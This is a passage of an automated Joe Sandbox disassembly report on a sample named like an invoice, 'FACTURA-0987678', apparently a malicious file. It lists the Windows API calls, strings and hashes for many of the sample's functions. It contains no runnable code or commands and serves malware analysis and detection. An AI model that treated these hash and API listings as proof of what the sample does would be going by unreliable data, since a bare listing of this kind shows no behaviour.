                                                                            • Opcode Fuzzy Hash: 5b9886e43883da92f03a6437b1411af787e34622ecc1342368bf3a098ccdaf84
                                                                            • Instruction Fuzzy Hash: 2841E475900209AFDB28DF34DC42ABA73E9EF05710F24446EE549E7382EA32D906AB11
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00F5716A
                                                                            • CreateMenu.USER32 ref: 00F57185
                                                                            • SetMenu.USER32(?,00000000), ref: 00F57194
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F57221
                                                                            • IsMenu.USER32(?), ref: 00F57237
                                                                            • CreatePopupMenu.USER32 ref: 00F57241
                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F5726E
                                                                            • DrawMenuBar.USER32 ref: 00F57276
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                             • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                            • String ID: 0$F
                                                                            • API String ID: 176399719-3044882817
                                                                            • Opcode ID: 19e0701e874011640e895502e2d1544c1ae9e1f08fc14b0d9cf04f545d2a36fa
                                                                            • Instruction ID: 7581dae208dc2257dca1cf3c1ece0b1a9c5b6ca9b25d5a9a6afef3cabc0754a1
                                                                            • Opcode Fuzzy Hash: 19e0701e874011640e895502e2d1544c1ae9e1f08fc14b0d9cf04f545d2a36fa
                                                                            • Instruction Fuzzy Hash: 50414675A01309AFDB20EF64E844E9ABBB5FB08351F144069FE05A7361D731A918EF90
                                                                            APIs
                                                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00F5755E
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00F57565
                                                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00F57578
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00F57580
                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 00F5758B
                                                                            • DeleteDC.GDI32(00000000), ref: 00F57594
                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00F5759E
                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00F575B2
                                                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00F575BE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                            • String ID: static
                                                                            • API String ID: 2559357485-2160076837
                                                                            • Opcode ID: efb2041ef705c06a5d9ac21a768bc0096a27ffb80ec653ba271453e20f507571
                                                                            • Instruction ID: 19e09516d7edf67073eb16908451c97ebe77ec012ff4dfc64588bee2db06d735
                                                                            • Opcode Fuzzy Hash: efb2041ef705c06a5d9ac21a768bc0096a27ffb80ec653ba271453e20f507571
                                                                            • Instruction Fuzzy Hash: A7316E72504218BBDF12AF64EC08FDB3F69EF09322F150265FB15961A0D735D819EBA4
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00EF6E3E
                                                                              • Part of subcall function 00EF8B28: __getptd_noexit.LIBCMT ref: 00EF8B28
                                                                            • __gmtime64_s.LIBCMT ref: 00EF6ED7
                                                                            • __gmtime64_s.LIBCMT ref: 00EF6F0D
                                                                            • __gmtime64_s.LIBCMT ref: 00EF6F2A
                                                                            • __allrem.LIBCMT ref: 00EF6F80
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EF6F9C
                                                                            • __allrem.LIBCMT ref: 00EF6FB3
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EF6FD1
                                                                            • __allrem.LIBCMT ref: 00EF6FE8
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EF7006
                                                                            • __invoke_watson.LIBCMT ref: 00EF7077
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                            • String ID:
                                                                            • API String ID: 384356119-0
                                                                            • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                            • Instruction ID: c7bb0298edab578c7532a35a3cfd60aa979dbc00df7d370cb826b88d35998e91
                                                                            • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                            • Instruction Fuzzy Hash: FE71E876A0071BABD714DE68DC41BBAB7E8AF04724F145229F654F72C1EB74EE009790
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00F32542
                                                                            • GetMenuItemInfoW.USER32(00F95890,000000FF,00000000,00000030), ref: 00F325A3
                                                                            • SetMenuItemInfoW.USER32(00F95890,00000004,00000000,00000030), ref: 00F325D9
                                                                            • Sleep.KERNEL32(000001F4), ref: 00F325EB
                                                                            • GetMenuItemCount.USER32(?), ref: 00F3262F
                                                                            • GetMenuItemID.USER32(?,00000000), ref: 00F3264B
                                                                            • GetMenuItemID.USER32(?,-00000001), ref: 00F32675
                                                                            • GetMenuItemID.USER32(?,?), ref: 00F326BA
                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F32700
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F32714
                                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F32735
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                            • String ID:
                                                                            • API String ID: 4176008265-0
                                                                            • Opcode ID: 0ff8dcd23173b311c0507597e50454e8c8eadadacd62ff688cd30913029f8e89
                                                                            • Instruction ID: 689ffdb43d55a6d840712d5d1e7c3ab93025ce82d9d2ad3d7af21a08ac1b9ec2
                                                                            • Opcode Fuzzy Hash: 0ff8dcd23173b311c0507597e50454e8c8eadadacd62ff688cd30913029f8e89
                                                                            • Instruction Fuzzy Hash: C3618DB1900249AFDF51CF64DC89EBE7BB8FF45324F180059E942A7251D731AE05EB21
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00F56FA5
                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00F56FA8
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00F56FCC
                                                                            • _memset.LIBCMT ref: 00F56FDD
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F56FEF
                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00F57067
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$LongWindow_memset
                                                                            • String ID:
                                                                            • API String ID: 830647256-0
                                                                            • Opcode ID: bea6c1709f2858e54177900d6e00bde692c37829d0ef169a18062358172754f5
                                                                            • Instruction ID: ae60550c8d6fdbbb3774bb410bb6403780471be255619a915a7c963e1186936f
                                                                            • Opcode Fuzzy Hash: bea6c1709f2858e54177900d6e00bde692c37829d0ef169a18062358172754f5
                                                                            • Instruction Fuzzy Hash: 91618C71900608AFDB11DFA4DC81EEE77F8EB08710F10019AFA14EB2A1D771AE45EB90
                                                                            APIs
                                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00F26BBF
                                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 00F26C18
                                                                            • VariantInit.OLEAUT32(?), ref: 00F26C2A
                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 00F26C4A
                                                                            • VariantCopy.OLEAUT32(?,?), ref: 00F26C9D
                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00F26CB1
                                                                            • VariantClear.OLEAUT32(?), ref: 00F26CC6
                                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 00F26CD3
                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F26CDC
                                                                            • VariantClear.OLEAUT32(?), ref: 00F26CEE
                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F26CF9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                            • String ID:
                                                                            • API String ID: 2706829360-0
                                                                            • Opcode ID: 966e7dba52c84f9deec5fb175b072cffb8f2ce543767f749ba39bcad522acca2
                                                                            • Instruction ID: 8a0f383828d502b9de948c76b1ea1b1f8b1bc7d3d6c2793b9b93ba184e4800e8
                                                                            • Opcode Fuzzy Hash: 966e7dba52c84f9deec5fb175b072cffb8f2ce543767f749ba39bcad522acca2
                                                                            • Instruction Fuzzy Hash: 90415275A0022D9FCF04EFA4DC449AEBBB9EF48351F008069E955E7261CB31A945DB90
                                                                            APIs
                                                                            • WSAStartup.WS2_32(00000101,?), ref: 00F45793
                                                                            • inet_addr.WS2_32(?), ref: 00F457D8
                                                                            • gethostbyname.WS2_32(?), ref: 00F457E4
                                                                            • IcmpCreateFile.IPHLPAPI ref: 00F457F2
                                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00F45862
                                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00F45878
                                                                            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00F458ED
                                                                            • WSACleanup.WS2_32 ref: 00F458F3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                            • String ID: Ping
                                                                            • API String ID: 1028309954-2246546115
                                                                            • Opcode ID: d989b303c364c19db960e87b855444f3b9dfb79feb2e8941526b5ed6d5877634
                                                                            • Instruction ID: 0d91d46aeea83d0535a8e7ea9f2cfc7a2ece79e2982beecd91e42aea081e3b9f
                                                                            • Opcode Fuzzy Hash: d989b303c364c19db960e87b855444f3b9dfb79feb2e8941526b5ed6d5877634
                                                                            • Instruction Fuzzy Hash: F6515071A047009FDB10EF25DC45B6A7BE4EF48B20F04496AF956EB2A2DB70ED05EB41
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00F3B4D0
                                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00F3B546
                                                                            • GetLastError.KERNEL32 ref: 00F3B550
                                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 00F3B5BD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                            • API String ID: 4194297153-14809454
                                                                            • Opcode ID: ff3d8da0bd4640730099f270b799f13f7b47b5c2afa960f1f0b8929bc2d25289
                                                                            • Instruction ID: 8f276b47c5b5b09c85af773e8e621efc5ab0d54caa1f68a65b1368ca2976255f
                                                                            • Opcode Fuzzy Hash: ff3d8da0bd4640730099f270b799f13f7b47b5c2afa960f1f0b8929bc2d25289
                                                                            • Instruction Fuzzy Hash: 7F318336A00209EFCB40EB68CC55AAD77B4FF84321F584166E605E7295DB70DA42EB51
                                                                            APIs
                                                                              • Part of subcall function 00ED7DE1: _memmove.LIBCMT ref: 00ED7E22
                                                                              • Part of subcall function 00F2AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F2AABC
                                                                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00F29014
                                                                            • GetDlgCtrlID.USER32 ref: 00F2901F
                                                                            • GetParent.USER32 ref: 00F2903B
                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F2903E
                                                                            • GetDlgCtrlID.USER32(?), ref: 00F29047
                                                                            • GetParent.USER32(?), ref: 00F29063
                                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00F29066
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 1536045017-1403004172
                                                                            • Opcode ID: 5725eda85ece4732c6a2430310883f2106dfdb1854c67e6297ec4a8970a14ff4
                                                                            • Instruction ID: 0e81c127f29fb159a1e5b0cef622e0a2d1927939c8d32aeda8ce4d1383dbe242
                                                                            • Opcode Fuzzy Hash: 5725eda85ece4732c6a2430310883f2106dfdb1854c67e6297ec4a8970a14ff4
                                                                            • Instruction Fuzzy Hash: 6621F871A00208BBDF04EBA4DC85EFEBBB5EF49310F100156F961972A1DB759819EB21
                                                                            APIs
                                                                              • Part of subcall function 00ED7DE1: _memmove.LIBCMT ref: 00ED7E22
                                                                              • Part of subcall function 00F2AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F2AABC
                                                                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00F290FD
                                                                            • GetDlgCtrlID.USER32 ref: 00F29108
                                                                            • GetParent.USER32 ref: 00F29124
                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F29127
                                                                            • GetDlgCtrlID.USER32(?), ref: 00F29130
                                                                            • GetParent.USER32(?), ref: 00F2914C
                                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00F2914F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 1536045017-1403004172
                                                                            • Opcode ID: d1cdc688c859ca634415dbdc8972ca8afc87b6d8f623a4bd468df6c2dee873a3
                                                                            • Instruction ID: b3af426b3d7af6167d187d388df1a27f0c47b981c3ff51bc240cc605efda8df4
                                                                            • Opcode Fuzzy Hash: d1cdc688c859ca634415dbdc8972ca8afc87b6d8f623a4bd468df6c2dee873a3
                                                                            • Instruction Fuzzy Hash: 9C210775E00208BBDF00ABA4DC85FFEBBB4EF44300F100056FA51A72A1DB798819EB20
                                                                            APIs
                                                                            • GetParent.USER32 ref: 00F2916F
                                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00F29184
                                                                            • _wcscmp.LIBCMT ref: 00F29196
                                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00F29211
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameParentSend_wcscmp
                                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                            • API String ID: 1704125052-3381328864
                                                                            • Opcode ID: 14fb1b3e3307c811b9f7e1aad3796d02a0afd832e6d731cabe03c159bc5aa7b9
                                                                            • Instruction ID: 84ec8e06d150c51cd27edc5c825b80588ac8b76ef471f53eae37d53b66741933
                                                                            • Opcode Fuzzy Hash: 14fb1b3e3307c811b9f7e1aad3796d02a0afd832e6d731cabe03c159bc5aa7b9
                                                                            • Instruction Fuzzy Hash: B011E73664C31BB9EA113664FC0AEB737DC9B15730F30006AFB10E60D2FEA1A8517695
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(?), ref: 00F488D7
                                                                            • CoInitialize.OLE32(00000000), ref: 00F48904
                                                                            • CoUninitialize.COMBASE ref: 00F4890E
                                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 00F48A0E
                                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00F48B3B
                                                                            • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002,?,00000001,00F62C0C), ref: 00F48B6F
                                                                            • CoGetObject.OLE32(?,00000000,00F62C0C,?), ref: 00F48B92
                                                                            • SetErrorMode.KERNEL32(00000000), ref: 00F48BA5
                                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00F48C25
                                                                            • VariantClear.OLEAUT32(?), ref: 00F48C35
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                            • String ID:
                                                                            • API String ID: 2395222682-0
                                                                            • Opcode ID: 1b48d70edbc917e4435e48b0b17c02a86c2225ba47bda200b66a9e6f1c2bf6a1
                                                                            • Instruction ID: eb84929b0ee79a23dac9962dbd3ce14c236fd5fe875387c497cfdc3c3be37c84
                                                                            • Opcode Fuzzy Hash: 1b48d70edbc917e4435e48b0b17c02a86c2225ba47bda200b66a9e6f1c2bf6a1
                                                                            • Instruction Fuzzy Hash: ECC115B1608305AFC700EF64C88492BBBE9FF89798F00495DF9899B251DB71ED06DB52
                                                                            APIs
                                                                            • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00F37A6C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
